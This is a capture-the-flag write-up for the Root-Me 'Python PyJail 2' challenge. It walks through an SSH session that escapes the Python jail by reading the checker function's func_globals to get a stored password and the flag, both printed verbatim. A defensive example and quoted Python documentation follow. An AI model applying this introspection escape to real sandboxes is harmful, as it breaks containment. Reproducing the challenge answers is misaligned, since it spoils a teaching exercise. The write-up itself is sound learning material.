LINK: https://www.root-me.org/en/Challenges/App-Script/Python-PyJail-2e
Reference: http://n3k0sec.top/2018/04/15/root-me-App-Script/
Solution:
[ BlackArch ~ ]# ssh -p 2222 app-script-ch9@challenge02.root-me.org
_ _ _ ___ ____
___| |__ __ _| | | ___ _ __ __ _ ___ / _ \___ \
/ __| '_ \ / _` | | |/ _ \ '_ \ / _` |/ _ \ | | |__) |
| (__| | | | (_| | | | __/ | | | (_| | __/ |_| / __/
\___|_| |_|\__,_|_|_|\___|_| |_|\__, |\___|\___/_____|
|___/ root-me.org
app-script-ch9@challenge02.root-me.org's password:
__ _ __
___ __ ____ / /__ _(_) / Welcome on PyJail2
/ _ \/ // / // / _ `/ / /
/ .__/\_, /\___/\_,_/_/_/ Use getout() function if you want to
/_/ /___/ escape from here and get the flag !
>>> print dir(getout)
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
>>> print getattr(getout,dir(getout)[-2])
{'execute': <function execute at 0xb7cb4f0c>, 'random': <built-in method random of Random object at 0x83dcec4>, '__builtins__': <module '__builtin__' (built-in)>, '__file__': '/challenge/app-script/ch9/ch9.py', 'cmd': <module 'cmd' from '/usr/lib/python2.7/cmd.pyc'>, '__package__': None, 'sys': <module 'sys' (built-in)>, 'passwd': 'cf95e28ee52545298411f5bee2ca8a54', 'intro': ' __ _ __\n ___ __ ____ / /__ _(_) /\tWelcome on PyJail2\n / _ \\/ // / // / _ `/ / / \n / .__/\\_, /\\___/\\_,_/_/_/ \tUse getout() function if you want to\n /_/ /___/ \tescape from here and get the flag !\n', 'Jail': <class __main__.Jail at 0xb7cadbcc>, '__name__': '__main__', 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, '__doc__': None, 'md5': <built-in function openssl_md5>}
>>> print list(getattr(getout,dir(getout)[-2]))
['execute', 'random', '__builtins__', '__file__', 'cmd', '__package__', 'sys', 'passwd', 'intro', 'Jail', '__name__', 'os', '__doc__', 'md5']
>>> print list(getattr(getout,dir(getout)[-2]))[-7]
passwd
>>> print getout(getattr(getout,dir(getout)[-2])[list(getattr(getout,dir(getout)[-2]))[-7]])
Well done ! Here is your so desired flag :
ValidateMeDude!
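The session above works because a Python function keeps a reference to the namespace of the module that defined it (`func_globals`, also spelled `__globals__`), and `passwd` lives in that same namespace as `getout`. The following added example is not the challenge's code: it is Python 3, and `audit_exposed`, `make_checker` and the secret value are constructed names. It audits what an exposed function hands out and contrasts a layout that keeps only a digest in the function's namespace.

```python
import hashlib
import hmac
import os  # imported only so this namespace resembles the challenge's
import types

passwd = "constructed-demo-secret"  # constructed value, not the challenge's


def getout(guess):
    """Vulnerable layout: secret and checker share one module namespace."""
    return guess == passwd


def audit_exposed(fn):
    """List what fn.__globals__ hands to anyone holding a reference to fn."""
    report = {"modules": [], "strings": []}
    for name, value in fn.__globals__.items():
        if name.startswith("__"):
            continue  # skip interpreter bookkeeping such as __name__
        if isinstance(value, types.ModuleType):
            report["modules"].append(name)
        elif isinstance(value, (str, bytes)):
            report["strings"].append(name)
    return {kind: sorted(names) for kind, names in report.items()}


def make_checker(secret):
    """Reduced layout: the exposed function sees a digest and two helpers."""
    def check(guess):
        return compare_digest(sha256(guess.encode()).hexdigest(), DIGEST)
    namespace = {
        "sha256": hashlib.sha256,
        "compare_digest": hmac.compare_digest,
        "DIGEST": hashlib.sha256(secret.encode()).hexdigest(),
    }
    # Rebind the code object to the minimal namespace built above.
    return types.FunctionType(check.__code__, namespace, "getout")


if __name__ == "__main__":
    print(audit_exposed(getout))                # lists passwd and os
    print(audit_exposed(make_checker(passwd)))  # lists only DIGEST
```

The reduced layout assumes a high-entropy secret and only removes the plaintext from the function's namespace; an in-process interpreter prompt is still not a security boundary.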
Reference: https://docs.python.org/2/library/functions.html?highlight=dir#dir
https://docs.python.org/2/library/functions.html?highlight=getattr#getattr

- getattr(object, name[, default])
  Return the value of the named attribute of object. name must be a string. If the string is the name of one of the object’s attributes, the result is the value of that attribute. For example, getattr(x, 'foobar') is equivalent to x.foobar. If the named attribute does not exist, default is returned if provided, otherwise AttributeError is raised.

- dir([object])
  Without arguments, return the list of names in the current local scope. With an argument, attempt to return a list of valid attributes for that object.

  If the object has a method named __dir__(), this method will be called and must return the list of attributes. This allows objects that implement a custom __getattr__() or __getattribute__() function to customize the way dir() reports their attributes.

  If the object does not provide __dir__(), the function tries its best to gather information from the object’s __dict__ attribute, if defined, and from its type object. The resulting list is not necessarily complete, and may be inaccurate when the object has a custom __getattr__().

  The default dir() mechanism behaves differently with different types of objects, as it attempts to produce the most relevant, rather than complete, information:
  - If the object is a module object, the list contains the names of the module’s attributes.
  - If the object is a type or class object, the list contains the names of its attributes, and recursively of the attributes of its bases.
  - Otherwise, the list contains the object’s attributes’ names, the names of its class’s attributes, and recursively of the attributes of its class’s base classes.

  The resulting list is sorted alphabetically. For example:

  >>> import struct
  >>> dir()   # show the names in the module namespace
  ['__builtins__', '__doc__', '__name__', 'struct']
  >>> dir(struct)   # show the names in the struct module
  ['Struct', '__builtins__', '__doc__', '__file__', '__name__', '__package__', '_clearcache', 'calcsize', 'error', 'pack', 'pack_into', 'unpack', 'unpack_from']
  >>> class Shape(object):
          def __dir__(self):
              return ['area', 'perimeter', 'location']
  >>> s = Shape()
  >>> dir(s)
  ['area', 'perimeter', 'location']